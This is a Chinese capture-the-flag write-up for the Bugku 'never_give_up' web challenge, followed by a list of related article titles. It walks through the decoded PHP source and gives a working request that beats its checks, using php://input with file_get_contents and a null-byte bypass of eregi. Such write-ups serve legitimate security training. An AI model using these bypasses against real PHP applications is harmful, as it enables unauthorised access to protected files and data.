bugku never_give_up file_get_contents()有php://input漏洞 eregi \x00绕过
bugku never_give_up
- 0x00 never_give_up
- 0x01 解题流程
- 1.1查看首页 及源码
- 1.2 访问1p.html
- 1.3解码
- 1.4 分析代码
- 1.5 payload
0x00 never_give_up
0x01 解题流程
1.1查看首页 及源码
发现一个页面 访问
1.2 访问1p.html
自动跳转到主页 直接查看源码
得到JS代码
其中申明 words变量
和OutWord()方法
将 escape解码后的words变量写入页面中。
words 变量 经过 url编码 base64 编码 先要解码
1.3解码
";if(!$_GET['id'])
{header('Location: hello.php?id=1');exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{echo 'no no no no no no no';return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{require("f4l2a3g.txt");
}
else
{print "never never never give up !!!";
}?>
1.4 分析代码
if(!$_GET['id'])
get 传递的 id参数为空
if(stripos($a,'.'))
{echo 'no no no no no no no';return ;
}如果 $a 即get传递的a的参数 含有. 就会输出nonono
striops($a,'.') 是返回$a变量中 .第一次出现的位置
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{require("f4l2a3g.txt");
}
else
{print "never never never give up !!!";
}$data=将$a文件读取到一个字符串的内容
想要获得到flag
1.$data必须等于bugku is a nice plateform!
2. $id ==0
3. $b长度大于5
4. 111拼接 $b的第一位 要 在1114中 比如 111 或者 1114
5. $b的第一位 不等于4
综上 a参数不能含 . 所以第三部分就不考虑 找存在bugku…字符串的文件
直接利用file_get_contents() 配合php://input 协议 post提交数据绕过。
$a=php://input post bugku is a nice plateform!
$id = 0
eregi 存在%00截断绕过 \x00
$b=\x0012345* 第一位 substr($b,0,1) 即为 "\x00" 及匹配
测试$id=0 直接等于0 不可以
测试如果 等于 字母的话 值也等于0
1.5 payload
/hello.php?id=abc&a=php://input&b=%001234567
bugku is a nice plateform!
bugku never_give_up file_get_contents()有php://input漏洞 eregi \x00绕过相关推荐
- e7xue.php漏洞_简要分析最近的dedecms通杀漏洞以及漏洞补丁的绕过
话说文章写得菜不要紧,首先标题要跟大牛一样! 作者:单恋一支花 出自:t00ls 转载请注明出处,如有雷同,纯属别人抄袭,嘿嘿! 一:写在前面 今天晚上想老婆了,失眠了,蛋裂之余,进吐司寻找基友,惊现 ...
- 微软:macOS 漏洞可用于绕过TCC技术,访问用户敏感数据
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 微软 365 Defender 研究团队指出,威胁行动者可利用 macOS 漏洞 powerdir (CVE-2021-30970) 绕过TCC ...
- 漏洞解决方案-认证绕过
漏洞解决方案-认证绕过 前置知识 修复方案 前置知识 大多数金融行业信息系统业务场景中,对于交易的安全,采用安全认证的方式保护,认证的因子包括静态密码.短信验证码.UsbKEY,OTP令牌等,一旦业务 ...
- bugku never_give_up
打开题目f12有提示,打开后跳转到bugku首页,直接view-source查看源码 view-source:http://114.67.175.224:11378/1p.html php源码在-- ...
- 文件包含漏洞及简单绕过
文件包含漏洞 文章目录 文件包含漏洞 DVWA靶场对文件包含漏洞的解释 About Objective 漏洞发生原因 防御与绕过 DVWA File inclusion medium 绝对目录绕过 双 ...
- 【文件包含漏洞03】文件包含漏洞的空字符绕过及六种利用方式
目录 1 内容简介 本节概述 实验环境 2 空字符绕过 2.1 实验基础知识 2.2 实验环境及准备 2.3 实验步骤 2.3.1 正常访问 2.3.2 空字符绕过 2.3.3 额外的方式 3 利用方 ...
- Web安全-文件上传漏洞与WAF绕过
文章目录 概述 Webshell简述 上传漏洞原理 上传漏洞绕过 解析漏洞 IIS 6.0解析漏洞 Apache解析漏洞 Nginx解析漏洞 Windows文件命名 客户端检测绕过 更改前端JS代码 ...
- nginx 上传文件漏洞_浅谈文件上传漏洞(其他方式绕过总结)
前言 上一篇文章简单的介绍了绕过客户端检测,现在总结一下其他方式绕过. 正文 1.1 服务端MIME类型检测绕过 检测原理:用户上传文件时,服务器会获取这个文件的MIME值,与事先设置好的进行比对,如 ...
- url存在链接注入漏洞_url跳转漏洞原理及绕过方式
注:本文仅供学习参考 0x01 url跳转原理及利用 0x02 url跳转bypass 0x03 url跳转修复 0x01 url跳转原理及利用 先走个流程说些废话,url重定向漏洞也称url任意跳转 ...
- 文件上传漏洞 — 前端JS绕过、MIME类型绕过
文件上传漏洞的相关讲解基于upload-labs靶场,搭建教程见文件上传漏洞靶机搭建教程 前端JS绕过 浏览器访问http://127.0.0.1/Pass-01/index.php进入靶机pass0 ...
最新文章
- SQL SERVER 触发器示例
- Scrapy和MongoDB的应用
- [转]图解APP的商业模式
- Android开发心得-ListView的监听事件
- webpack图解-学习笔记
- android studio背景模糊_[Android翻译]CameraX:过去、现在和未来的一瞥
- 【转】3.4(译)构建Async同步基元,Part 4 AsyncBarrier
- 基于JavaWeb实现的研究室综合系统
- 实体类多层嵌套 遍历_JS获取元素多层嵌套思路详解
- 【.bash_profile 与 .bashrc 的区别】
- LG30刷小米系统_小米10 Pro 手机 安卓 11 Beta1 线刷包放出,附刷机教程
- 支付宝客户端架构解析:Android 客户端启动速度优化之「垃圾回收」
- 谷歌面试题:两个玻璃球摔碎的楼层高度
- HashSet及LinkedHashSet源码分析(基于JDK1.6)
- opengles之展翅飞翔的雄鹰
- 总结:IOTA反驳DCI实验室提出的漏洞荒谬至极
- 书签书签书签书签书签书签
- 抖音上热门原来这么简单-抖音培训-抖音上热门教程
- python画好看的图案-妈耶,python的散点图竟然能画这么好看!
- android手机号码恢复,安卓手机怎么找回通讯录联系人_安卓手机恢复手机通讯录教程_3DM手游...
热门文章
- RFID电子标签对于图书管理的应用
- DM 源码阅读系列文章(七)定制化数据同步功能的实现
- android自动获取天气,Android获取天气预报的两种方式(国家气象局和中央气象台天气预报API)...
- Python 多重共线性检验
- avr 74hc595驱动数码管动态显示c语言例程,ATmega8驱动74HC595程序
- 工行电子银行收费标准
- [C++杂谈]:MFC中使用excel2007读写excel表格
- 上方用计算机英文,教你Win10计算器应用变成英文的解决方法
- unity3d Space Game太空射击游戏资源包
- 酷我音乐到设备和驱动器_怎么把腾讯视频图标从电脑设备和驱动器里面删除